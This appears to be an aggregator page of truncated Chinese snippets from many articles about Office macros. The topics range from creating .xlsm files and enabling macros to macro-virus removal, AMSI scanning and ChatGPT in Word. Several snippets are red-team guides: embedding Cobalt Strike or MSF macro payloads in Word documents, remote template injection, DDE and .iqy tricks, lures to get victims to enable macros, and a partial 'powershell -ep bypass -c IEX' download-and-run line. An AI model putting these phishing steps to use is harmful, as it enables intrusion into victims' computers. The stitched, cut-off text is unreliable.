文章背景:工作生活中涉及到VBA,时常要将Excel文件保存为.xlsm格式。而在右键新建的可选项中,一般只有.xlsx文件。下面介绍如何在右键新建选项中添加启用宏的工作簿.xlsm。...(6)回到.xlsm文件夹,点击新建的shellnew文件夹,双击FileName打开,将刚才复制的内容填到数值数据中,并将最后的ecxel12.xlsx 改为 excel14m.xlsm。...(7)在桌面上新建一个空的启用宏的工作簿,将其重命名为:Excel14M.xlsm,然后将该文件移动到以下路径的文件夹中:C:\Program Files\Microsoft Office\root\vfs...在桌面上点击右键,选择新建,此时可以看到在可选项中已经有了启用宏的工作簿。...参考资料: [1] 如何在右键中添加“新建启用宏的工作簿.xlsm”(https://jingyan.baidu.com/article/066074d62dca1cc3c21cb099.html)
Excel 的宏编程有兴趣的可以了解下: Excel 宏编程-第一个Hello World程序,实战演示! 有的 Excel 工具是用宏写的,需要启用宏才可以用,没启用宏可能会有如下报错。...下面来讲一下宏的启用方式: 很简单,点击左上角的菜单,然后点击 Excel 选项进入设置。 ? 然后,在信任中心找到信任中心设置。 ? 在宏设置选择启用宏就好了。...要重新启用 Excel 才能生效哦! ?
在实际渗透中,我们常用office宏钓鱼来获取目标设备的权限。尤其是在红蓝对抗中,这使得office宏也是最佳社会工程攻击最有效的手段之一。...实验环境 kali2022 office word2019 生成宏 启动CS-攻击-office钓鱼 选择相应的监听后,点击生成。...复制宏代码 新建word宏模板 首位打开word,文件—选项—自定义功能区—勾选开发者工具 点击开发者工具—Visual Basic 将代码复制到ThisDocument 最后保存为启用宏的...word模板 然后将宏模板上传到我们的服务器,目的是让对方能够下载我们的宏文档。...这里我用了系统自带的模板 保存文档(格式为.docx) 制作带有宏的病毒文档 将上一步中的文档修改后缀名为.zip,如逍遥子大表哥.docx改为逍遥子大表哥.zip 依次打开word—_rels—settings.xml.rels
那么关于宏的安装和录制就不在这里详述了,我们再来把视线转向我们今天的主角——宏病毒 宏病毒是一种寄存在文档或模板的宏中的计算机病毒,存在于数据文件或模板中(字处理文档、数据表格、数据库、演示文档等),使用宏语言编写...在Word和其他微软Office系列办公软件中,宏分为两种 内建宏:局部宏,位于文档中,对该文档有效,如文档打开(AutoOpen)、保存、打印、关闭等 全局宏:位于office模板中,为所有文档所共用...,如打开Word程序(AutoExec) 宏病毒的传播路线如下: 单机:单个Office文档 => Office文档模板 => 多个Office文档(文档到模块感染) 网络:电子邮件居多 首先Office...ctrl+s保存,这里可以保存成.dotm或.docm都可以,这两个文件格式都是启用宏的Word格式 ? 我这里生成一个.dotm模板文件 ?...这里我假设已经将word发给了我要钓鱼的主机上,可以使用社工的方法使诱导被害者点击启用这个宏,具体方法我就不说了,师傅们自行拓展 ? 点击过后发现已经上线了 ?
Sub AutoOpen() Shell ("calc") //只需要写这个就行了 End Sub AutoExec:启动 Word 或加载全局模板时 AutoNew:每次新建文档时 AutoOpen...:每次打开已有文档时 AutoClose:每次关闭文档时 AutoExit:退出 Word 或卸载全局模板时 保存为docm(启用宏的word文档) 打开文件,就蹦出计算器了。...(前提是在信任中心设置开启所有宏) 当然,一般情况下打开此类文件会显示 启用内容后就会弹计算器了 Word DDE 在word文件里,输入 ctrl+F9,进入到域代码编辑。...,再创一个启用宏的模板文件。...然后在带模板的文档的压缩包里面修改一些内容,使其指向的模板修改为我们自己创建的模板文件,这之间的过程可以由smb协议完成,故过查杀几率较高。 我们在启用宏的模板文件(doc3.dotm)里写入宏。
OFFICE中的WORD和EXCEL都有宏。Word便为大众事先定义一个共用的通用模板(Normal.dot),里面包含了基本的宏。只要一启动Word,就会自动运行Normal.dot文件。...如果在Word中重复进行某项工作,可用宏使其自动执行。Word提供了两种创建宏的方法:宏录制器和Visual Basic编辑器。...在默认的情况下,Word将宏存贮在 Normal模板中,以便所有的Word文档均能使用,这一特点几乎为所有的宏病毒所利用。...宏实际上是一系列Word 命令的组合,用户可以在Visual Basic 编辑器中打开宏并进行编辑和调试,删除录制过程中录进来的一些不必要的步骤,或添加无法在Word 中录制的指令。...二、利用MSF生成宏的攻击payload ? 利用生成的jaky.vba文件弄进office文件里 ? 这里要启用一下 宏 默认是关闭的 宏-查看宏 ? 在文档里随便输入个文字什么的。
攻击邮件主题高度定制化,如“邀请您参与《朝鲜半岛无核化路径》闭门研讨会”或“请审阅附件中关于印太安全架构的未公开草稿”,极具迷惑性。...,其中包含启用宏的Word文档,文件名如“Draft_Security_Policy_v2_FINAL.docm”。...2.2 载荷执行:宏与模板注入在宏启用场景下,典型VBA代码如下:Sub AutoOpen()Dim cmd As Stringcmd = "powershell -ep bypass -c IEX (...攻击者构造的DOCX文档在word/settings.xml中嵌入:并在word/_rels/settings.xml.rels中定义:...自动从远程服务器加载DOTM模板,其中包含AutoExec宏,实现无宏启用提示的静默执行——因模板加载不触发宏安全警告。
隐秘性强: (1)几乎没有留下可以追踪的痕迹,框架可以直接从内存中执行有效负载; (2)缺乏日志记录,PowerShell日志默认不能使用,通常不会在计算机上启动监视或扩展记录。...例如,在污水攻击中,利用了宏与PowerShell构建了APT攻击,具体过程如下: (1)使用精心构造的钓鱼文档,诱使目标人员打开文档启用宏; (2)文档宏执行后,向文件系统写入脚本及编码过的PowerShell...我们以一个简单的例子对宏代码进行分析(样本文件附后[3]),这里启用宏后使用word中的开发功能VBA进行对宏代码的读取(也可使用oledump.py对宏代码进行提取)。...该用户再用模板创建word时候,此时模板来感染文档,将文档的宏代码替换为模板的宏代码,此时文档被感染。 2.当文档的宏感染模板时,加上了时间、日期、用户名、地址等内容在代码的最后。...这里为宏病毒的特性,在word广泛使用的情况下,可以利用宏进行传播,结合Powershell与C&C通信,造成大规模的影响。 六、总结 由于PowerShell的种种特点,使得其成为攻击者的利器。
常用的套路使对方开启宏, 文档是被保护状态,需要启用宏才能查看; 添加一张模糊的图片,提示需要启用宏才能查看高清图片; 提示要查看文档,按给出的一系列步骤操作; 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护...利用Word文档加载附加模板时的缺陷所发起的恶意请求,而达到的攻击目的,所以当目标用户点开攻击者发送的恶意Word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。...靶机打开,启用宏,可上线。...的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。...当受害者双击打开时,默认会用Excel打开,弹出警告,点击启用 因为前面的iqy文件是用cmd执行的,所以会继续询问是否启动另一个应用程序,CMD.EXE.
我们可以使用现有的Word + ChatGPT,手动来回Copy,但显然也不够丝滑。如果能在现有的Word中嵌入ChatGPT就是最好的解决方案。 接下来我把心得方法分享给大家并且有手把手详细教程。...我的版本信息: PC:Windows 10 Word:Microsoft Word 2013 国内版:chatGPT国内中文镜像官方原版在线免费体验 (taiyangyukeji.com) 1.创建宏模板...2.添加工具栏图标: 这一步的主要目标是在Word菜单栏,新建一个调用的入口 打开文件→选项→自定义功能区(跟第一步一样) 在自定义功能区,先新建选项卡,再新建组,然后在宏下面把上一步创建的宏放到里面:...Word中多了一个ChatGPT选项卡 ? 3.使用 文档空白处写一段文字,如:写一篇关于夏天的散文,然后选中 点击ChatGPT选项卡→ChatGPT模块,等一下就可以看到生成的内容了 ?...还需要打开一些内部的库:工具→引用 ? 需要打开的有如下: ? 如果有安全提示错误,还需要把VB安全选项设置一下:文件→选项→信任中心→信任中心设置 ? 把启用所有宏打开 ?
0x01 白名单申请 Win + R 打开运行窗口,输入gpedit.msc,来到用户配置 -> 管理模板 -> 系统处,打开只允许指定的 Windows 程序 在打开的窗口中,勾选已启用,之后点击显示按钮...大体的步骤如下: 1、打开 Microsoft Word 或者 Excel 2、来到视图 --> 宏 3、任意填写一个宏的名称 4、宏的位置选择为当前文档 5、点击创建 ?...6、在打开的编辑器中,删除掉原来的内容 7、点击 Cobalt Strike 上的Copy Macro按钮 8、将刚复制 Cobalt Strike 生成的内容粘贴到打开的编辑器中 ?...9、关闭编辑器 10、将文档保存为启用宏的文档,这里可以选择保存为启用宏的 Word 文档或者Word 97-2003 文档 ?...接下来使用钓鱼邮件等方式上传到靶机,当靶机运行该文档后启用宏内容即可上线。 ? ? 这里不得不吐槽一句,Microsoft Office 的东西安装是真的麻烦。
通过阅读理解微软文档我们可以知道amsi对宏的检测查杀流程: 1.word等等钓鱼文件加载宏 2.VBA宏运行时,运行时会有一个循环的缓冲区中记录数据和参数调用Win32,COM, VBA等等api的情况...3.amsi监控着缓冲区中的情况,一旦我们的宏调用了一些敏感的API或一些敏感的数据交互,就会触发amsi的触发器。 4.amsi停止宏执行并从循环缓冲区取出内容传递。...Office 365 AMSI 用户配置 > 管理模板 > Microsoft Office 2016 > 安全设置 1.对所有文档禁用:如果对所有文档禁用该功能,则不会对启用的宏执行运行时扫描。...2.为低信任文档启用:如果为低信任文档启用该功能,则将为启用宏的所有文档启用该功能,除了: 在宏安全设置设置为“启用所有宏”时打开的文档 从可信位置打开的文档 作为受信任文档的文档 包含由可信发布者数字签名的...后记 对于 Windows 用户,任何在 Windows 10 的内置脚本主机上使用混淆和规避技术的恶意软件都会在比以往任何时候都更深的层次上进行自动检查,从而提供额外的保护级别。
当用户打开文档并启用宏功能时,Word文档就会下载并打开另一个受密码保护的Microsoft Excel文档。...一旦宏被写入并准备就绪,Word文档就会将注册表中的策略设置为“禁用Excel宏警告”,并从Excel文件中调用恶意宏函数。...混淆机制分析 由于Microsoft Office会自动禁用宏功能,因此攻击者会试图用出现在Word文档中的消息欺骗目标用户以启用宏功能。...消息中会提醒用户:“此文档是在以前版本的Microsoft Office Word中创建的。若要查看或编辑此文档,请单击顶部栏上的“启用编辑”按钮,然后单击“启用内容”。”...攻击者可以利用DDE和VBA来实现这个目标,而这两个功能是标准的微软工具随Windows系统提供。 DDE是一种在应用程序(如Excel和Word)之间传输数据的方法。
标签:Word VBA 有多种方法可以使我们在创建、打开或关闭Word文档时自动运行宏。...方法1:使用文档事件 在Word中,按Alt+F11组合键打开VBE,然后在“工程 – Project”窗口中,双击“Microsoft Word对象”,再双击“ThisDocument”。...如果存储在除Normal.dotm以外的任何模板中,这些事件的行为方式与Document事件相同,当创建、打开或关闭附加到模板的文档时,它们将被触发。...不过,存储在加载项(存储在Word启动目录中的.dotm文件)中的AutoNew、AutoOpen和AutoClose宏将无法全局运行。...方法3:使用应用程序事件 如果希望在打开任何文档时触发宏,而不管文档附加到哪个模板,如上所述,最简单的方法是编写一个AutoOpen宏并将其存储在Normal.dotm中。
打开需要检查的文档,单击“文件”菜单栏,选择“另存为”命令,如果对 话框中的保存类型固定为“文档模板”, 则表示这个文件已经感染了宏病毒。...二、清除宏病毒的方法 1、 OFFICE2003方法: 打开文档,工具――宏――宏(或者使用组合键“Alt+F8”,如OFFICE版本不同找不到选项,可以使用此组合键)调出宏对话框,如果在弹出的对话框中有已经记录的宏的话...Word环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中,这时需要重新启动计算机,找到这个文件,并把它删除,再运行Word就可以了。...但是有些宏病毒“知道”用户会找到No rmal.dot并删除掉,所以它会在硬盘的多个目录中放上同样的No rmal.dot,如果只删除Templates下的一个,Word会按照Windows缺省的搜索路径进行搜索...,这样会加载其他有毒的Normal.dot,并把删除掉的再重新恢复这时,只要使用Windows中查找文件的方法把硬盘中所有的Normal.dot全部删除就可以了。
宏是 Office 自带的一种高级脚本特性,通过 VBA 代码, 可以在 Office 中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中 的一些任务自动化。...而宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样 的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。...Visual Basic for Applications(VBA)是 Visual Basic 的一种宏语言,是微软开发出来在 其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。...另存为的 Word 类型务必要选”Word 97-2003 文档 (*.doc)”,即 doc 文件,保证低版 本可以打开。之后关闭,再打开即可执行宏代码。...这里需要选择否,然后保存为启用宏的 word 文档 ?
宏是 Office 自带的一种高级脚本特性,通过 VBA 代码, 可以在 Office 中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中 的一些任务自动化。...而宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样 的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。...Visual Basic for Applications(VBA)是 Visual Basic 的一种宏语言,是微软开发出来在 其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。...CobaltStrike 生成宏 打开 Word 文档,点击“Word 选项 — 自定义功能区 — 开发者工具(勾选) — 确定”。...,Ctrl+A 全选,然后 Ctrl+C 粘贴 CS 生成宏代码流程 然后粘贴进来 再 Ctrl+S 保存 这里需要选择否,然后保存为启用宏的 word 文档 注意:这里一定要先关闭杀软,不然会保存失败
介绍了一种使用网站关键字的技术,以便在系统中触发shellcode。...之后我们在攻击主机上使用Python启动一个web服务来提供Invoke-Shellcode.ps1的下载: ? 之后我们需要再攻击主机上启动MSF框架并设置监听: ?...之后修改当PowerShell-C2脚本中的Word以及DownloadString地址: ?...下面我们演示一下流程,首先使用Word新建一个Word文档,选择视图->宏->查看宏: ? 输入任意宏名称,之后点击“创建” ?...之后发送恶意文档给目标用户,当目标用户使用Word打开恶意文档并点击"启用宏"时恶意代码将成功执行: ? ? 之后在Python提供的Web服务端将会收到两次请求: ?
0×01 利用Cobalt strike制作一个word宏病毒 首先我们需要制作一个word宏病毒来进行远控操作。在Cobalt strike中,需要新建一个监听程序来进行监听,如下图: ?...选择前面所创建的listener,如下: ? ? 复制宏内容,然后打开一个word文档,添加宏,记得添加的地方不能有误,添加宏的位置在 视图 -> 宏。...创建宏以后添加代码是在project中,这点不能搞错,如下图。 ? 添加完成以后,只需要保存为启用宏的word就可以了,这样就制作为一个word宏病毒文件。...clone url填写需要克隆网站的url后面填写本地就可以,在真实的渗透中,应当是拿下一台二级域名的站,然后进行挂链接. 然后访问该网站就搭建成功。 ?...targets是要发送邮箱地址的文件,比如: admin@admin.com test@admin.com template是要发送邮件的模板,这个可以在个人邮箱中导出一个即可。
1、引导型病毒:引导型病毒隐藏在磁盘内,在系统文件启动前已经驻留在内存中。...主要感染磁盘的引导区,影响软盘或硬盘的引导扇区 2、文件型病毒:通常感染执行文件(包括exe和com文件等)但也有些会感染其他可执行文件(如dll和scr等)。...3、宏病毒:专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,他很容易通过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如Microsoft Word和Excel。...宏病毒的传播方式通常如下:字处理程序word在打开一个带宏病毒的文档或模板时,激活了病毒宏,病毒宏将自身复制至word的通用(Normal)模板中,以后在打开或关闭文件时病毒宏就会把病毒复制到该文件中。...4、蠕虫病毒:蠕虫病毒一般是通过复制自身在互联网环境下进行传播,它的传染目标是互联网内的所有计算机,局域网条件下的共享文件夹、电子邮件Email、网络中的恶意网页、大量存在着漏洞的服务器等都成为蠕虫传播的良好途径
云服务器
ICP备案
云直播
即时通信 IM
实时音视频
